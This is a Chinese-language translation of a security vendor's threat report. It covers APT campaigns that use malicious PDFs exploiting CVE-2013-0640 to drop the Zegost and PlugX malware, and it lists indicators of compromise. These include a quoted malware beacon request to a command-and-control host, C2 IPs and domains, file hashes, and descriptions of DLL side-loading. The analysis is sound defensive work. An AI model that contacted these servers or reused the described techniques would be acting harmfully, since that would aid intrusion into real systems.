APT 攻擊藉由惡意PDF攻擊程式碼大量增加中

在2012年裡，我們看到了各式各樣的APT攻擊活動利用Microsoft Word的漏洞 – CVE-2012-0158。這是一種轉變，之前最常被利用的Word漏洞是CVE-2010-3333。雖然我們還是繼續看到CVE-2012-0158被大量的使用，不過我們也注意到惡名昭彰的「MiniDuke」攻擊所製造針對Adobe Reader漏洞 – CVE-2013-0640的攻擊程式碼使用量的增加。這些惡意PDF檔案所植入的惡意軟體和MiniDuke並無關聯，但卻和正在進行中的APT-進階持續性滲透攻擊 (Advanced Persistent Threat, APT)活動有關。

Zegost

趨勢科技所發現的一組惡意PDF檔案，藏有上述漏洞攻擊碼的誘餌文章使用的是越南文，檔案名稱也是相同的語言。

這些PDF檔案內嵌著和MiniDuke攻擊活動所使用類似的JavaScript程式碼。相似之處包括了類似的函數和變數名稱。

使用Didier Steven的PDFiD工具來分析這PDF檔案，顯示出這兩個PDF檔案非常相似。雖然並非完全相同，但兩者之間的相似之處是難以否認的。有意思的地方是「/Javascript」、「/OpenAction」和「/Page」。這些地方代表著有JavaScript出現，有某種自動行為出現和頁碼。這三個項目可以幫我們確認MiniDuke和Zegost的相似之處。

植入的檔案和資料也差不多。這兩種攻擊活動都植入相同數量的檔案，有著非常相似的檔案名稱與類似的目的。即使註冊表的修改部分也很類似。

不過這也是相似的全部地方。這些PDF所植入的檔案被稱為Zegost（或HTTPTunnel），曾經在之前的攻擊裡被發現過。和MiniDuke攻擊所植入的惡意軟體並無關聯。Zegost惡意軟體有個鮮明的特徵：

GET /cgi/online.asp?hostname=[COMPUTERNAME]&httptype=[1][not%20httptunnel] HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)

Host: dns.yimg.ca

Cache-Control: no-cache

命令和控制伺服器 – dns.yimg.ca所反查出的IP – 223.26.55.122，一直被用在比較知名的命令和控制伺服器上，像是imm.conimes.com和iyy.conimes.com。用來註冊這網域的電子郵件地址 – llssddzz@gmail.com，也被用來註冊scvhosts.com（另外一個已知的C＆C伺服器器）和updata-microsoft.com，應該也是有問題的網域。

PlugX (客製化的遠端存取工具, 針對臺灣在內特定目標發動 APT 攻擊))

第二組的惡意PDF檔案間並不一定都直接有關連，雖然它們都會值入不同的PlugX變種。我們所分析的攻擊似乎針對著日本、韓國和印度的目標。

然而，雖然這些攻擊也是利用漏洞 – CVE-2013-0640，但是它們和上面所討論的樣本不同。比較檔案時就可以看出差異，比方說使用的PDF格式版本：

Zegost	MiniDuke	PlugX
PDF Header: %PDF-1.4	PDF Header: %PDF-1.4	PDF Header: %PDF-1.7
obj 8	obj 8	obj 43
endobj 8	endobj 8	endobj 44
stream 3	stream 1	stream 10
endstream 3	endstream 2	endstream 11
xref 1	xref 1	xref 4
trailer 1	trailer 1	trailer 4
startxref 1	startxref 1	startxref 4
/Page 1	/Page 1	/Page 6
/Encrypt 0	/Encrypt 1	/Encrypt 0
/ObjStm 0	/ObjStm 0	/ObjStm 0
/JavaScript 1	/JavaScript 1	/JavaScript 1
/AA 0	/AA 0	/AA 0
/OpenAction 1	/OpenAction 1	/OpenAction 1
/AcroForm 1	/AcroForm 1	/AcroForm 1
/JBIG2Decode 0	/JBIG2Decode 0	/JBIG2Decode 0
/RichMedia 0	/RichMedia 0	/RichMedia 0
/Launch 0	/Launch 0	/Launch 0
/EmbeddedFile 0	/EmbeddedFile 0	/EmbeddedFile 0
/XFA 1	/XFA 1	/XFA 1
/Colors > 2^24 0	/Colors > 2^24 0	/Colors > 2^24 0

PlugＸ也會植入檔案和資料，但是卻和Zegost或MiniDuke都不相同。檔案數量不同，植入原因也不同。

Zegost	MiniDuke	PlugX
UserCache.bin	UserCache.bin	UserCache.bin
39f5d27d1a5e34ce9863406b799ef47a	39f5d27d1a5e34ce9863406b799ef47a	39f5d27d1a5e34ce9863406b799ef47a
ACECache10.lst	ACECache10.lst	ACECache10.lst
a1bb36552f1336466b4d728948393585	77402ee32c656d68eeb8a07e2a041dfb	77e16369d995628ff9df31c56129a2f2
A9RD50B.tmp (PDF)	A9RE077.tmp (PDF)	SharedDataEvents
dd28e2e06465464f0cb5eca4a9013421	85b890c0b10faa13014d4a22dae3fe3c	1a8d23271be2c45f31a537eaefbbf55d
A9RD50A.tmp (PDF)	A9RE078.tmp (PDF)	SharedDataEvents-journal
4f4ceedd8da84be88dbea7b49f1b82e5	e719894252665a7cbf8efc18babdd70e	4754e6d5ea3b6ca2357146a1e56c3c47
		SharedDataEvents-journal
		b16f24e72c42059cd44a9fb48ea8bf98
		A9RD53D.tmp (PDF)
		200569e47e6e5a3f629533423d4ba03b
		SharedDataEvents-journal
		b930ef3a77e6c4669312f582fc405f61
		SharedDataEvents-journal
		38149cfb66075a9009d460e86c138141
		SharedDataEvents-journal
		566ea4be505009d422d5fd6c395a33b9
		A9RD53C.tmp (PDF)
		ca79b7a45410dd1e995a4997dcc6d126

PlugX:HHX

PlugX的第一組變種會利用Microsoft HTML輔助說明編譯器，就如同這篇文章內所描述的一樣。我們已經看到這變種被用在目標攻擊內。在這案例中，攻擊者對目標發送了一封電子郵件，以誘使他們打開惡意附加檔案。

我們所分析的樣本會將檔案植入資料夾 – hhx內，並且利用正常的Microsoft檔案 – hhx.exe去載入hha.dll，接著再載入hha.dll.bak。我們所分析檔案所使用的命令和控制伺服器是14.102.252.142。

PlugX：PDH

我們所分析的第二組PlugX變種，會將檔案植入到資料夾 – PDH內，並且利用已經簽證過的QQ瀏覽器更新服務檔案來載入PDH.dll，接著會載入PDH.pak。

這些檔案利用dnsport.chatnook.com、inter.so-webmail.com和223.25.242.45做為命令和控制伺服器。

結論

趨勢科技的研究顯示這些APT-進階持續性滲透攻擊 (Advanced Persistent Threat, APT)活動的攻擊者開始利用MiniDuke攻擊活動所製造的漏洞攻擊碼，並將其加入到他們的軍火庫中。在這同時，我們也發現似乎有其他APT攻擊活動已經開發出自己的方式來利用相同的漏洞。攻擊漏洞 – CVE-2013-0640的惡意PDF數量增加，也代表了APT攻擊者從使用惡意Word檔案攻擊相對老舊的漏洞 – CVE-2012-0158開始轉移陣地了。

＠原文出處：Malicious PDFs On The Rise作者：Nart Villeneuve（資深威脅研究員）

想了解更多關於網路安全的秘訣和建議，只要到趨勢科技粉絲網頁或下面的按鈕按讚